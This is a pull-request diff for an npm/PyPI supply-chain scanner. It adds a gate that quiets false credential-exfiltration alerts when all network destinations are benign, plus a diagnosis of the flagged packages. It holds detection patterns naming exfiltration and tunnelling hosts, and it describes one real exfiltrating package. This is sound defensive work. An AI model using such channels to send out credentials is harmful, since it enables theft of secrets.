### PR TITLE
v2.11.115 - feat: FPR segment A — destination gate + receiver-aware sinks

### DIFF
--- a/FPR-segment-A-diagnosis-2026-06-14.md
+++ b/FPR-segment-A-diagnosis-2026-06-14.md
@@ -1,0 +1,66 @@
+# Segment A diagnosis — destination-aware taint FPs (2026-06-14)
+
+Read-only diagnosis (Step 1 of the approved plan) of the 12 T1a packages driven by the three
+taint types. Goal: establish the exact failure mode per package → drives the precise fix.
+
+## The 12 (11 FP + 1 TP), by sink type
+
+| Package | Taint type | **Sink** | In-file destination(s) | Verdict / gateable |
+|---|---|---|---|---|
+| **ecto-corsair-whisper** | intent | network | **webhook.site + ext-IP 154.57.164.x** | **TP — real exfil. STAYS (suspicious-domain + ext-IP veto)** |
+| agent-systems | intent | network | generativelanguage.googleapis.com + api.anthropic.com | FP — GEMINI not in map + multi-provider strict-fail |
+| @remnic/plugin-codex | intent + detached | network | localhost:4318 (otel collector) | FP — **localhost = local IPC** |
+| proxypro-harness | intent | network **+ exec** | localhost + example.com | FP (network part); exec part = out of scope |
+| @zcouncil/cli | cross_file | network | openai/anthropic/x.ai + own + localhost | FP — **no gate wired**; multi-provider |
+| contextdevkit | cross_file | network | google-AI + analytics CDNs | FP — no gate wired; multi-host |
+| amicus | cross_file | network | openrouter.ai/openai/anthropic/deepseek | FP — no gate wired; multi-provider |
+| claude-rpc | detached | network | own *.workers.dev + claude.com + gist | FP — no gate wired; own + multi |
+| @dfosco/storyboard | cross_file | network | tailwind/base-ui CDNs + localhost (doc URLs) | FP — no gate wired; not even creds |
+| @riddledc/riddle-proof | detached | network | own riddledc.com + localhost + discord | FP — no gate wired; own + local |
+| **@policysynth/agents** | intent | **exec_sink** | (eval/Function, openAiResponsesCleanup.js) | FP — **NOT destination-gateable** |
+| **@steedos/objectql** | intent | **exec_sink** | (eval, lib/util/index.js) | FP — **NOT destination-gateable** |
+
+## Findings that refine the plan
+
+1. **2 of 11 FPs are `credential_read → exec_sink`** (`@policysynth/agents`, `@steedos/objectql`;
+   `proxypro-harness` partially). A destination gate **cannot** fix these — the sink is eval, there
+   is no host to judge. They are a *separate* driver: legit AI SDK that reads an API key and uses
+   `eval`/`new Function`/dynamic-`require` in the same file. **Out of segment-A scope** → documented
+   follow-up. Segment A therefore recovers **~9**, not 13.
+
+2. **The per-env-var model (`isSDKPattern`) is too narrow for multi-provider files.** `agent-systems`
+   reads `GEMINI_API_KEY` **and** `ANTHROPIC_API_KEY` and calls **both** googleapis + anthropic. The
+   curated path is strict all-match for ONE env var's domains → fails when a file legitimately talks
+   to several providers. The right model is **destination-benignness**: suppress iff EVERY in-scope
+   network destination is *known-benign* (provider-allowlist ∪ package-own-domain ∪
+   loopback/localhost/private-IP) and NONE is anomalous.
+
+3. **`cross_file_dataflow` + `detached_credential_exfil` have no destination check at all** — the
+   single highest-leverage gap (6 of the 9 FPs). Wiring the destination-benignness gate here is the
+   core of segment A.
+
+4. **Loopback/localhost/private-IP must be treated as local (benign), distinct from external public
+   IPs.** `isSDKPattern` today rejects *all* raw IPs → mislabels `127.0.0.1`/`localhost:4318`
+   (otel/dev IPC) as suspicious. Anti-evasion preserved: ecto's **external public** IPs
+   (154.57.164.x) stay anomalous.
+
+5. **AI-provider allowlist gap** in `SDK_ENV_DOMAIN_MAP`: missing `GEMINI_`→generativelanguage.googleapis.com,
+   `OPENROUTER_`→openrouter.ai, `DEEPSEEK_`, `XAI_`/`X_AI_`→x.ai, azure-cognitive, bedrock. The map
+   predates the 2025-26 provider explosion.
+
+6. **Anti-evasion (the SPOF concern, addressed):** the allowlist is curated and never includes
+   abuse-prone "legit" channels (telegram/discord webhooks, gist/raw.githubusercontent, paste sites).
+   Unknown domains count as **anomalous** (not suppressed) → a C2 on a normal-looking domain still
+   fires. The suspicious-domain + external-IP + paste vetoes are absolute. This is the same curated
+   pattern as the existing `SDK_ENV_DOMAIN_MAP` / FP-caps, bounded by the broad backtest.
+
+## Garde-fou check — ecto STAYS (verified)
+`ecto` destinations: `webhook.site` (∈ `SUSPICIOUS_DOMAIN_PATTERNS`) + external public IPs
+`154.57.164.82/.71` + loopback. Any anomalous host ⇒ not benign ⇒ intent/flow keeps firing,
+score 100, T1a. The destination-benignness gate cannot declassify it by construction.
+
+## Implementation consequence
+The fix is a **destination-benignness gate** (richer than a literal port of `isSDKPattern`), called
+by all three taint detectors. Extract the shared destination logic to a leaf module, add an
+AI-provider allowlist + own-domain + loopback/private handling, keep all existing vetoes. Exec-sink
+FPs explicitly deferred.

--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.114",
+  "version": "2.11.115",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.11.114",
+      "version": "2.11.115",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.5.2",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.114",
+  "version": "2.11.115",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/intent-graph.js
+++ b/src/intent-graph.js
@@ -36,180 +36,17 @@ const SOURCE_TYPES = {
 // Sensitive env var patterns — env_access referencing these is credential theft, not config
 const SENSITIVE_ENV_PATTERNS = /TOKEN|KEY|SECRET|PASSWORD|CREDENTIAL|API_KEY|AUTH/i;
 
-// ============================================
-// DESTINATION-AWARE SDK DETECTION
-// ============================================
-// Curated allowlist: when an env var matching the pattern is sent to a matching domain,
-// it is legitimate SDK usage, not credential exfiltration.
-// Safe-by-default: unknown env vars or unknown domains remain CRITICAL.
-const SDK_ENV_DOMAIN_MAP = [
-  { envPattern: /^AWS_/i, domains: ['amazonaws.com', 'aws.amazon.com'] },
-  { envPattern: /^AZURE_/i, domains: ['azure.com', 'microsoft.com'] },
-  { envPattern: /^GOOGLE_|^GCP_/i, domains: ['googleapis.com', 'google.com'] },
-  { envPattern: /^FIREBASE_/i, domains: ['firebase.com', 'googleapis.com'] },
-  { envPattern: /^SALESFORCE_/i, domains: ['salesforce.com', 'force.com'] },
-  { envPattern: /^SUPABASE_/i, domains: ['supabase.co', 'supabase.com'] },
-  { envPattern: /^MAILGUN_/i, domains: ['mailgun.net', 'mailgun.com'] },
-  { envPattern: /^STRIPE_/i, domains: ['stripe.com'] },
-  { envPattern: /^TWILIO_/i, domains: ['twilio.com'] },
-  { envPattern: /^SENDGRID_/i, domains: ['sendgrid.com', 'sendgrid.net'] },
-  { envPattern: /^DATADOG_/i, domains: ['datadoghq.com'] },
-  { envPattern: /^SENTRY_/i, domains: ['sentry.io'] },
-  { envPattern: /^SLACK_/i, domains: ['slack.com'] },
-  { envPattern: /^GITHUB_/i, domains: ['github.com', 'githubusercontent.com'] },
-  { envPattern: /^GITLAB_/i, domains: ['gitlab.com'] },
-  { envPattern: /^CLOUDFLARE_/i, domains: ['cloudflare.com'] },
-  { envPattern: /^OPENAI_/i, domains: ['openai.com'] },
-  { envPattern: /^ANTHROPIC_/i, domains: ['anthropic.com'] },
-  { envPattern: /^MONGODB_|^MONGO_/i, domains: ['mongodb.com', 'mongodb.net'] },
-  { envPattern: /^AUTH0_/i, domains: ['auth0.com'] },
-  { envPattern: /^HUBSPOT_/i, domains: ['hubspot.com', 'hubapi.com'] },
-  { envPattern: /^CONTENTFUL_/i, domains: ['contentful.com'] },
-];
-
-// Tokens stripped when extracting brand keyword from env var name
-const ENV_NOISE_TOKENS = new Set([
-  'API', 'KEY', 'SECRET', 'TOKEN', 'PASSWORD', 'CREDENTIAL',
-  'AUTH', 'ACCESS', 'PRIVATE', 'PUBLIC', 'CLIENT', 'ID', 'URL'
-]);
-
-// Suspicious tunneling/proxy domains — never considered legitimate SDK destinations
-const SUSPICIOUS_DOMAIN_PATTERNS = /ngrok|serveo|localtunnel|burpcollaborator|requestbin|pipedream|webhook\.site/i;
-
-// URL extraction regex (matches http/https URLs in source code)
-const URL_EXTRACT_RE = /https?:\/\/[a-zA-Z0-9\-._~:/?#[\]@!$&'()*+,;=%]+/g;
-
-// Hostname extraction from Node.js request options: hostname: 'domain.com' or host: 'domain.com'
-const HOSTNAME_OPTION_RE = /(?:hostname|host)\s*:\s*['"`]([a-zA-Z0-9\-._]+)['"`]/g;
-
-/**
- * Extract env var name from an intent source threat message.
- * Messages look like: "process.env.SALESFORCE_API_KEY", "env var MAILGUN_API_KEY accessed"
- */
-function extractEnvVarFromMessage(sourceThreats) {
-  for (const t of sourceThreats) {
-    if (!t.message) continue;
-    // Match process.env.VAR_NAME pattern
-    const envMatch = t.message.match(/process\.env\.([A-Z_][A-Z0-9_]*)/i);
-    if (envMatch) return envMatch[1];
-    // Match standalone VAR_NAME patterns (e.g., "SALESFORCE_API_KEY")
-    const varMatch = t.message.match(/\b([A-Z][A-Z0-9]*(?:_[A-Z0-9]+)+)\b/);
-    if (varMatch) return varMatch[1];
-  }
-  return null;
-}
-
-/**
- * Extract brand keyword from env var name by removing noise tokens.
- * MAILGUN_API_KEY → MAILGUN, SALESFORCE_CLIENT_SECRET → SALESFORCE
- */
-function extractBrandFromEnvVar(envVarName) {
-  const parts = envVarName.toUpperCase().split('_');
-  const brandParts = parts.filter(p => !ENV_NOISE_TOKENS.has(p) && p.length > 0);
-  return brandParts.length > 0 ? brandParts[0] : null;
-}
-
-/**
- * Extract domain from a URL string.
- * Returns the hostname (without port).
- */
-function extractDomain(url) {
-  try {
-    const match = url.match(/^https?:\/\/([^/:?#]+)/i);
-    return match ? match[1].toLowerCase() : null;
-  } catch {
-    return null;
-  }
-}
-
-/**
- * Check if a domain matches any of the expected SDK domains (suffix match).
- * api.mailgun.net matches mailgun.net, sub.api.stripe.com matches stripe.com
- */
-function domainMatchesSuffix(domain, expectedDomains) {
-  for (const expected of expectedDomains) {
-    if (domain === expected || domain.endsWith('.' + expected)) return true;
-  }
-  return false;
-}
-
-/**
- * Check if an env var + file content represents a legitimate SDK pattern.
- *
- * Returns true ONLY if:
- * 1. The env var matches a known SDK mapping (allowlist) OR heuristic brand match
- * 2. ALL URLs in the file point to domains matching the expected SDK
- * 3. No suspicious tunneling/proxy domains are present
- *
- * @param {string} envVarName - e.g., "SALESFORCE_API_KEY"
- * @param {string} fileContent - source code of the file
- * @returns {boolean} true if SDK pattern (should skip intent pair)
- */
-function isSDKPattern(envVarName, fileContent) {
-  // Extract domains from full URLs (https://api.stripe.com/v1/charges)
-  const urls = fileContent.match(URL_EXTRACT_RE) || [];
-  const domains = urls.map(u => extractDomain(u)).filter(Boolean);
-
-  // Also extract hostnames from Node.js request options (hostname: 'api.stripe.com')
-  let hostnameMatch;
-  const hostnameRe = new RegExp(HOSTNAME_OPTION_RE.source, 'g');
-  while ((hostnameMatch = hostnameRe.exec(fileContent)) !== null) {
-    const hostname = hostnameMatch[1].toLowerCase();
-    if (hostname && !domains.includes(hostname)) {
-      domains.push(hostname);
-    }
-  }
-
-  // No URLs found — can't confirm SDK pattern, default to suspicious
-  if (domains.length === 0) return false;
-
-  // Check for suspicious tunneling domains — immediate fail
-  for (const domain of domains) {
-    if (SUSPICIOUS_DOMAIN_PATTERNS.test(domain)) return false;
-  }
-
-  // Check for raw IP addresses — immediate fail
-  for (const domain of domains) {
-    if (/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/.test(domain)) return false;
-  }
-
-  // 1. Try curated allowlist first (strict: ALL domains must match)
-  // Curated allowlist is authoritative — no relaxation here to prevent
-  // attacker injecting a legitimate domain alongside their C2 domain.
-  for (const mapping of SDK_ENV_DOMAIN_MAP) {
-    if (mapping.envPattern.test(envVarName)) {
-      return domains.every(d => domainMatchesSuffix(d, mapping.domains));
-    }
-  }
-
-  // R2: credential-suffixed env vars get relaxed domain matching (at least ONE match).
-  // SDKs commonly call their own API + CDN/logging/analytics domains.
-  // Safety: suspicious domains and raw IPs are already rejected above.
-  // Only applies to the heuristic fallback — curated allowlist stays strict.
-  const CREDENTIAL_SUFFIXES = ['_API_KEY', '_SECRET', '_TOKEN', '_SECRET_KEY', '_ACCESS_KEY'];
-  const upperName = envVarName.toUpperCase();
-  const hasCredentialSuffix = CREDENTIAL_SUFFIXES.some(s => upperName.endsWith(s));
-
-  // 2. Heuristic fallback: extract brand keyword and check domain labels
-  const brand = extractBrandFromEnvVar(envVarName);
-  if (!brand || brand.length < 3) return false; // Too short for reliable matching
-
-  const brandLower = brand.toLowerCase();
-  // 2a. Strict check: every domain matches brand (existing behavior)
-  // e.g., brand "ACME" matches "api.acme.com" (label "acme") but not "api.acmetech.com"
-  if (domains.every(d => {
-    const labels = d.split('.');
-    return labels.some(label => label === brandLower);
-  })) return true;
-
-  // 2b. R2 relaxed: credential suffix + at least one domain matches brand
-  if (hasCredentialSuffix && domains.some(d => {
-    const labels = d.split('.');
-    return labels.some(label => label === brandLower);
-  })) return true;
-
-  return false;
-}
+// Destination-aware SDK detection — extracted to a shared leaf module
+// (src/sdk-destination.js) so the same logic gates dataflow.js and the cross-file /
+// detached taint detectors, not just intent coherence. Re-exported below for
+// backward compatibility (dataflow.js imports isSDKPattern from this module).
+const {
+  isSDKPattern,
+  networkDestinationsAllBenign,
+  extractEnvVarFromMessage,
+  extractBrandFromEnvVar,
+  SDK_ENV_DOMAIN_MAP,
+} = require('./sdk-destination.js');
 
 
 // ============================================
@@ -384,26 +221,31 @@ function buildIntentPairs(threats, targetPath) {
         const pairKey = `${srcType}:${sinkType}:${file}`;
         if (pairSet.has(pairKey)) continue;
 
-        // Destination-aware SDK check: credential_read → network_external
-        // If the env var matches the API domain, this is legitimate SDK usage
+        // Destination-aware check: credential_read → network_external. Two
+        // complementary gates, EITHER ⇒ legitimate, skip the pair:
+        //  (1) isSDKPattern — per-env-var: the env var brand matches its API domain
+        //      (e.g. STRIPE_API_KEY → stripe.com).
+        //  (2) networkDestinationsAllBenign — env-var-independent: EVERY network host
+        //      in the file is a provider/local/reserved destination. Catches multi-
+        //      provider CLIs (reads GEMINI_API_KEY *and* ANTHROPIC_API_KEY, calls both)
+        //      and providers absent from the curated env→domain map. Same anti-evasion
+        //      floor (any suspicious/unknown/public-IP host ⇒ keep firing).
         if (srcType === 'credential_read' && sinkType === 'network_external' && targetPath) {
-          const envVarName = extractEnvVarFromMessage(sourceThreats);
-          if (envVarName) {
-            try {
-              let content = fileContentCache.get(file);
-              if (content === undefined) {
-                const filePath = path.join(targetPath, file);
-                content = fs.readFileSync(filePath, 'utf8');
-                fileContentCache.set(file, content);
-              }
-              if (isSDKPattern(envVarName, content)) {
-                // SDK pattern confirmed — skip this pair
-                pairSet.add(pairKey); // Mark as seen to avoid re-checking
-                continue;
-              }
-            } catch {
-              // File read error — default to suspicious (CRITICAL)
+          try {
+            let content = fileContentCache.get(file);
+            if (content === undefined) {
+              const filePath = path.join(targetPath, file);
+              content = fs.readFileSync(filePath, 'utf8');
+              fileContentCache.set(file, content);
             }
+            const envVarName = extractEnvVarFromMessage(sourceThreats);
+            if ((envVarName && isSDKPattern(envVarName, content)) || networkDestinationsAllBenign(content)) {
+              // First-party/SDK destination — skip this pair
+              pairSet.add(pairKey); // Mark as seen to avoid re-checking
+              continue;
+            }
+          } catch {
+            // File read error — default to suspicious (CRITICAL)
           }
         }
 

--- a/src/pipeline/executor.js
+++ b/src/pipeline/executor.js
@@ -17,7 +17,7 @@ const { scanGitHubActions } = require('../scanner/github-actions.js');
 const { scanEntropy } = require('../scanner/entropy.js');
 const { scanAIConfig } = require('../scanner/ai-config.js');
 const { deobfuscate } = require('../scanner/deobfuscate.js');
-const { buildModuleGraph, annotateTaintedExports, detectCrossFileFlows, annotateSinkExports, detectCallbackCrossFileFlows, detectEventEmitterFlows } = require('../scanner/module-graph');
+const { buildModuleGraph, annotateTaintedExports, detectCrossFileFlows, filterFirstPartyNetworkFlows, annotateSinkExports, detectCallbackCrossFileFlows, detectEventEmitterFlows } = require('../scanner/module-graph');
 const { loadCachedIOCs } = require('../ioc/updater.js');
 const { normalizePythonName } = require('../scanner/python.js');
 const { scanPythonSource } = require('../scanner/python-source.js');
@@ -173,6 +173,10 @@ async function execute(targetPath, options, pythonDeps, warnings) {
       // EventEmitter cross-module flow detection
       const emitterFlows = await yieldThen(() => detectEventEmitterFlows(graph, tainted, sinkAnnotations, targetPath));
       crossFileFlows = crossFileFlows.concat(emitterFlows);
+      // FP gate (segment A): drop cross_file_dataflow flows whose network sink targets
+      // only first-party/local/provider destinations — legit SDK calls, not exfil.
+      // Suspicious/unknown/public-IP destinations and exec sinks are kept (ecto stays).
+      crossFileFlows = filterFirstPartyNetworkFlows(crossFileFlows, targetPath);
     };
     let graphTimerId;
     const timeout = new Promise((_, reject) => {

--- a/src/pipeline/processor.js
+++ b/src/pipeline/processor.js
@@ -8,6 +8,7 @@ const { applyFPReductions, applyCompoundBoosts, calculateRiskScore, getSeverityW
 const { loadPriorVersionSignatures, computeSignatures, saveCachedSignatures } = require('../scoring/delta-multiplier.js');
 const { annotateConfidenceTiers } = require('../rules/confidence-tiers.js');
 const { buildIntentPairs } = require('../intent-graph.js');
+const { networkDestinationsAllBenign } = require('../sdk-destination.js');
 const { debugLog } = require('../utils.js');
 const { getPackageMetadata } = require('../scanner/npm-registry.js');
 const { checkReleaseZero } = require('../scanner/release-zero.js');
@@ -351,13 +352,20 @@ async function process(threats, targetPath, options, pythonDeps, warnings, scann
       const hasCredFlow = fileThreats.some(t => t.type === 'suspicious_dataflow');
       const alreadyCompound = fileThreats.some(t => t.type === 'detached_credential_exfil');
       if (hasDetached && hasCredFlow && !alreadyCompound) {
-        deduped.push({
-          type: 'detached_credential_exfil',
-          severity: 'CRITICAL',
-          message: 'Detached process + credential dataflow — background exfiltration (cross-scanner compound).',
-          file,
-          count: 1
-        });
+        // FP gate (segment A): skip when the file's network destinations are ALL
+        // first-party/local/provider (legit SDK/agent), not exfil. Unknown/suspicious/
+        // public-IP host — or unreadable file — keeps it firing (confirmed-benign only).
+        let destAllBenign = false;
+        try { destAllBenign = networkDestinationsAllBenign(fs.readFileSync(path.join(targetPath, file), 'utf8')); } catch { /* unreadable → not benign */ }
+        if (!destAllBenign) {
+          deduped.push({
+            type: 'detached_credential_exfil',
+            severity: 'CRITICAL',
+            message: 'Detached process + credential dataflow — background exfiltration (cross-scanner compound).',
+            file,
+            count: 1
+          });
+        }
       }
     }
   }

--- a/src/scanner/ast-detectors/handle-post-walk.js
+++ b/src/scanner/ast-detectors/handle-post-walk.js
@@ -1,5 +1,7 @@
 'use strict';
 
+const { networkDestinationsAllBenign } = require('../../sdk-destination.js');
+
 function handlePostWalk(ctx) {
   // SANDWORM_MODE: zlib inflate + base64 decode + eval/Function/Module._compile = obfuscated payload
   if (ctx.hasZlibInflate && ctx.hasBase64Decode && ctx.hasDynamicExec) {
@@ -322,7 +324,12 @@ function handlePostWalk(ctx) {
   const hasSensitiveEnvInFile = ctx.threats.some(t =>
     t.file === ctx.relFile && t.type === 'env_access' && t.severity === 'HIGH'
   );
-  if (hasDetachedInFile && hasSensitiveEnvInFile && ctx.hasNetworkCallInFile) {
+  // FP gate (segment A): suppress this credential→network compound when EVERY network
+  // destination in the file is first-party/local/provider (e.g. an otel collector on
+  // localhost, an SDK POST to its own API). A suspicious/unknown/public-IP host — or no
+  // literal host at all — leaves it firing (conservative: confirmed-benign only).
+  const destAllBenign = ctx._content ? networkDestinationsAllBenign(ctx._content) : false;
+  if (hasDetachedInFile && hasSensitiveEnvInFile && ctx.hasNetworkCallInFile && !destAllBenign) {
     ctx.threats.push({
       type: 'detached_credential_exfil',
       severity: 'CRITICAL',
@@ -334,7 +341,7 @@ function handlePostWalk(ctx) {
   // Audit v3 bypass fix: uncaughtException + env access + network = silent exfiltration
   // Pattern: process.on('uncaughtException', handler) that reads env vars and sends to network.
   // Never legitimate — error handlers don't need to send credentials to external servers.
-  if (ctx.hasUncaughtExceptionHandler && hasSensitiveEnvInFile && ctx.hasNetworkCallInFile) {
+  if (ctx.hasUncaughtExceptionHandler && hasSensitiveEnvInFile && ctx.hasNetworkCallInFile && !destAllBenign) {
     ctx.threats.push({
       type: 'uncaught_exception_exfil',
       severity: 'CRITICAL',

--- a/src/scanner/module-graph/annotate-sinks.js
+++ b/src/scanner/module-graph/annotate-sinks.js
@@ -1,10 +1,10 @@
 'use strict';
 
 const path = require('path');
-const { SINK_CALLEE_NAMES, SINK_MEMBER_METHODS, SINK_INSTANCE_METHODS } = require('./constants.js');
+const { SINK_CALLEE_NAMES, SINK_MEMBER_METHODS, SINK_INSTANCE_METHODS, NON_NETWORK_SINK_RECEIVER_ROOTS } = require('./constants.js');
 const {
   parseFile, walkAST, isRequireCall, isModuleExportsAssign,
-  getExportName, getFunctionBody, getMemberChain
+  getExportName, getFunctionBody, getMemberChain, getReceiverRootName
 } = require('./parse-utils.js');
 
 /**
@@ -87,11 +87,14 @@ function analyzeSinkExports(filePath) {
               return;
             }
           }
-          // .write(), .send(), .connect()
+          // .write(), .send(), .connect() — but not process.*/console.* (local I/O, not network)
           const method = node.callee.property.name || node.callee.property.value;
           if (SINK_INSTANCE_METHODS.has(method)) {
-            found = method + '()';
-            return;
+            const root = getReceiverRootName(node.callee);
+            if (!(root && NON_NETWORK_SINK_RECEIVER_ROOTS.has(root))) {
+              found = method + '()';
+              return;
+            }
           }
         }
       }

--- a/src/scanner/module-graph/constants.js
+++ b/src/scanner/module-graph/constants.js
@@ -26,8 +26,17 @@ const SINK_MEMBER_METHODS = new Set([
 ]);
 const SINK_INSTANCE_METHODS = new Set(['connect', 'write', 'send']);
 
+// Receiver roots that make connect/write/send LOCAL I/O or IPC, never external-network
+// exfil: `process.stdout/stderr.write`, `process.send` (child IPC to the parent), and any
+// `console.*`. SINK_INSTANCE_METHODS matches by method name alone, so without this a
+// console/stderr write of a tainted value reads as a cross-file network sink (segment-A FP
+// driver: contextdevkit, amicus). Real socket/ws/req sinks (receivers `socket`/`ws`/`req`/
+// `net.connect()`…) are unaffected. Globals are trusted here as they are everywhere else.
+const NON_NETWORK_SINK_RECEIVER_ROOTS = new Set(['process', 'console']);
+
 
 module.exports = {
   MAX_GRAPH_NODES, MAX_GRAPH_EDGES, MAX_FLOWS, MAX_TAINT_DEPTH,
-  SENSITIVE_MODULES, ACORN_OPTIONS, SINK_CALLEE_NAMES, SINK_MEMBER_METHODS, SINK_INSTANCE_METHODS
+  SENSITIVE_MODULES, ACORN_OPTIONS, SINK_CALLEE_NAMES, SINK_MEMBER_METHODS, SINK_INSTANCE_METHODS,
+  NON_NETWORK_SINK_RECEIVER_ROOTS
 };

--- a/src/scanner/module-graph/detect-cross-file.js
+++ b/src/scanner/module-graph/detect-cross-file.js
@@ -4,10 +4,10 @@ const path = require('path');
 const fs = require('fs');
 const { debugLog } = require('../../utils');
 const { networkDestinationsAllBenign } = require('../../sdk-destination.js');
-const { MAX_FLOWS, SINK_CALLEE_NAMES, SINK_MEMBER_METHODS, SINK_INSTANCE_METHODS } = require('./constants.js');
+const { MAX_FLOWS, SINK_CALLEE_NAMES, SINK_MEMBER_METHODS, SINK_INSTANCE_METHODS, NON_NETWORK_SINK_RECEIVER_ROOTS } = require('./constants.js');
 const {
   parseFile, walkAST, isRequireCall, isLocalImport, isModuleExportsAssign,
-  getExportName, getMemberChain, resolveLocal
+  getExportName, getMemberChain, getReceiverRootName, resolveLocal
 } = require('./parse-utils.js');
 
 /**
@@ -598,7 +598,12 @@ function getSinkName(callNode) {
     // instance.connect(), socket.write(), ws.send()
     const method = callee.property.name || callee.property.value;
     if (SINK_INSTANCE_METHODS.has(method)) {
-      return `${method}()`;
+      // Reject process.*/console.* receivers: process.stdout/stderr.write,
+      // process.send (IPC), console.* are local I/O, never external-network exfil.
+      const root = getReceiverRootName(callee);
+      if (!(root && NON_NETWORK_SINK_RECEIVER_ROOTS.has(root))) {
+        return `${method}()`;
+      }
     }
   }
 

--- a/src/scanner/module-graph/detect-cross-file.js
+++ b/src/scanner/module-graph/detect-cross-file.js
@@ -1,7 +1,9 @@
 'use strict';
 
 const path = require('path');
+const fs = require('fs');
 const { debugLog } = require('../../utils');
+const { networkDestinationsAllBenign } = require('../../sdk-destination.js');
 const { MAX_FLOWS, SINK_CALLEE_NAMES, SINK_MEMBER_METHODS, SINK_INSTANCE_METHODS } = require('./constants.js');
 const {
   parseFile, walkAST, isRequireCall, isLocalImport, isModuleExportsAssign,
@@ -954,4 +956,49 @@ function findPipeChainCrossFileFlows(ast, relFile, graph, taintedExports, sinkEx
 }
 
 
-module.exports = { detectCrossFileFlows, expandTaintThroughReexports, collectImportTaint, propagateLocalTaint, getSinkName, findTaintedArgument };
+// A network sink carries a destination host we can judge; exec/command sinks
+// (eval, Function, child_process.*) do not, and are never destination-gated.
+function isNetworkSinkDescriptor(sink) {
+  const s = String(sink || '');
+  if (/^(eval|Function)\(\)$/.test(s)) return false;   // exec sink
+  if (/^child_process\./.test(s)) return false;        // command sink
+  return true; // fetch / http(s).request|get / WebSocket / XMLHttpRequest / connect|write|send
+}
+
+/**
+ * FP gate (segment A — destination-aware). Drop a cross_file_dataflow whose NETWORK
+ * sink targets ONLY benign destinations (loopback/private/reserved IP or a curated
+ * provider API) — a legitimate SDK that reads a key and POSTs to its provider is not
+ * exfiltration. Untouched (kept CRITICAL): exec/command sinks, and any flow whose sink
+ * file references a suspicious/paste host, a public IP, or any unknown domain (so a real
+ * exfil like ecto — webhook.site + direct-IP — keeps firing). The package stays visible
+ * via its other (lower-severity) signals, the same way intent-graph skips SDK pairs.
+ * Rationale + corpus: FPR-segment-A-diagnosis-2026-06-14.md.
+ *
+ * @param {Array} flows - assembled cross-file flows (main + callback + emitter)
+ * @param {string} packagePath - package root, to resolve sink file content
+ * @returns {Array} flows with first-party network FPs removed
+ */
+function filterFirstPartyNetworkFlows(flows, packagePath) {
+  if (!Array.isArray(flows) || flows.length === 0) return flows;
+  const contentCache = new Map();
+  const kept = [];
+  for (const flow of flows) {
+    if (flow && flow.type === 'cross_file_dataflow' && flow.sinkFile && isNetworkSinkDescriptor(flow.sink)) {
+      let content = contentCache.get(flow.sinkFile);
+      if (content === undefined) {
+        try { content = fs.readFileSync(path.resolve(packagePath, flow.sinkFile), 'utf8'); }
+        catch { content = ''; }
+        contentCache.set(flow.sinkFile, content);
+      }
+      if (content && networkDestinationsAllBenign(content)) {
+        debugLog(`[MODULE-GRAPH] cross_file_dataflow suppressed (first-party/local dest): ${flow.sourceFile} -> ${flow.sink} in ${flow.sinkFile}`);
+        continue; // first-party/local network destination → FP, drop
+      }
+    }
+    kept.push(flow);
+  }
+  return kept;
+}
+
+module.exports = { detectCrossFileFlows, expandTaintThroughReexports, collectImportTaint, propagateLocalTaint, getSinkName, findTaintedArgument, isNetworkSinkDescriptor, filterFirstPartyNetworkFlows };

--- a/src/scanner/module-graph/index.js
+++ b/src/scanner/module-graph/index.js
@@ -4,13 +4,13 @@ const { MAX_GRAPH_NODES, MAX_GRAPH_EDGES, MAX_FLOWS, MAX_TAINT_DEPTH } = require
 const { parseFile, resolveLocal, isLocalImport, toRel, isFileExists } = require('./parse-utils.js');
 const { buildModuleGraph, extractLocalImports, tryResolveConcatRequire } = require('./build-graph.js');
 const { annotateTaintedExports } = require('./annotate-tainted.js');
-const { detectCrossFileFlows } = require('./detect-cross-file.js');
+const { detectCrossFileFlows, filterFirstPartyNetworkFlows } = require('./detect-cross-file.js');
 const { annotateSinkExports } = require('./annotate-sinks.js');
 const { detectCallbackCrossFileFlows } = require('./detect-callback-flows.js');
 const { detectEventEmitterFlows } = require('./detect-event-flows.js');
 
 module.exports = {
-  buildModuleGraph, annotateTaintedExports, detectCrossFileFlows,
+  buildModuleGraph, annotateTaintedExports, detectCrossFileFlows, filterFirstPartyNetworkFlows,
   annotateSinkExports, detectCallbackCrossFileFlows, detectEventEmitterFlows,
   resolveLocal, extractLocalImports, parseFile, isLocalImport, toRel, isFileExists,
   tryResolveConcatRequire,

--- a/src/scanner/module-graph/parse-utils.js
+++ b/src/scanner/module-graph/parse-utils.js
@@ -107,6 +107,18 @@ function getMemberChain(node, depth) {
   return '';
 }
 
+// Root identifier of a call's receiver, e.g. `process` for (process.stdout).write(),
+// `process` for process.send(), `console` for console.error(), `sender` for sender.send().
+// Returns null when the receiver root is not a plain Identifier (e.g. this.x.write(),
+// foo().bar()). Used to reject local-IO/IPC receivers (process/console) from the
+// write/send/connect instance-method sink set, which matches by method name alone.
+function getReceiverRootName(callee) {
+  if (!callee || callee.type !== 'MemberExpression') return null;
+  let obj = callee.object;
+  while (obj && obj.type === 'MemberExpression') obj = obj.object;
+  return obj && obj.type === 'Identifier' ? obj.name : null;
+}
+
 function extractLiteralArg(args) {
   if (!args || args.length === 0) return '';
   const first = args[0];
@@ -136,6 +148,6 @@ function toRel(abs, packagePath) {
 
 module.exports = {
   parseFile, walkAST, isRequireCall, isLocalImport, isModuleExportsAssign,
-  getExportName, getFunctionBody, getMemberChain, extractLiteralArg,
+  getExportName, getFunctionBody, getMemberChain, getReceiverRootName, extractLiteralArg,
   resolveLocal, isFileExists, toRel
 };

--- a/src/sdk-destination.js
+++ b/src/sdk-destination.js
@@ -1,0 +1,328 @@
+'use strict';
+
+// ============================================
+// DESTINATION-AWARE SDK DETECTION (shared leaf module)
+// ============================================
+// Extracted from intent-graph.js (v2.11.x) so the same destination logic can gate
+// every credential→network taint detector — intent coherence (intent-graph.js),
+// dataflow (scanner/dataflow.js), cross-file flow (scanner/module-graph) and the
+// detached/uncaught compounds (scanner/ast-detectors). No project dependencies
+// (only the Node stdlib via callers) → safe to require from any scanner, no cycles.
+//
+// Curated allowlist: when an env var matching the pattern is sent to a matching domain,
